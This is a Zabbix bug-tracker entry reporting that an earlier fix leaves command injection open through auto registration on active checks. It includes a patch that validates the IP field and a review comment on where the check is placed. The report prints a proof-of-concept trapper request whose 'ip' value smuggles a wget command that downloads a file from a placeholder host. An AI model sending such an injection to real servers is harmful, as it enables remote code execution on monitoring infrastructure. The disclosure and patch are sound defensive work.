  1. ZABBIX FEATURE REQUESTS
  2. ZBXNEXT-3918

ZBX-12075 fix is not enough


    • Change Request
    • Resolution: Duplicate
    • Blocker
    • None
    • 2.2.18, 3.0.9
    • Server (S)
    • None

      I confirmed that you fixed ZBX-12075 etc. in 3.0.9 and 2.2.18, but it is not enough because you do not take care of the situation of active checks with auto registration.

      I send the following command to the Zabbix trapper.

      { "request":"active checks", "host":"foobar", "ip":";wget -O /tmp/s http://www.xxx.yyy.zzz/s;#" }

      If the Zabbix server allows auto registration, a host is registered. So, with the default scripts, command injection is possible.

      To fix the above, I attached a patch so that an incorrect IP is not accepted at auto registration on active checks.

      — src/zabbix_server/trapper/active.c 2017-02-27 18:22:48.000000000 +0900
      +++ src/zabbix_server/trapper/active.c.new 2017-05-30 11:15:19.623254495 +0900
      @@ -56,6 +56,12 @@ static int get_hostid_by_host(const char

      zabbix_log(LOG_LEVEL_DEBUG, "In %s() host:'%s'", __function_name, host);

      + if (FAIL == is_ip(ip))
      +

      { + zbx_snprintf(error, MAX_STRING_LEN, "invalid IP address [%s]", ip); + goto out; + }

      +
      if (FAIL == zbx_check_hostname(host))
      {
      zbx_snprintf(error, MAX_STRING_LEN, "invalid host name [%s]", host);
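
      Review bot: the `is_ip(ip)` check is placed right after the debug log at the top of get_hostid_by_host(), ahead of zbx_check_hostname(), so it rejects every "active checks" request with a non-IP `ip`, not only the auto-registration case the description targets. If `ip` can be empty or missing for a host that is already registered, that request now ends at `goto out` with "invalid IP address"; confirm what `ip` holds in that case, or move the check next to the registration step. The rejected value is also copied verbatim into `error`, so that string should be treated as untrusted wherever it is later logged or returned to the sender.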

            Unassigned
            daiki.matsuda@miraclelinux.com MATSUDA Daiki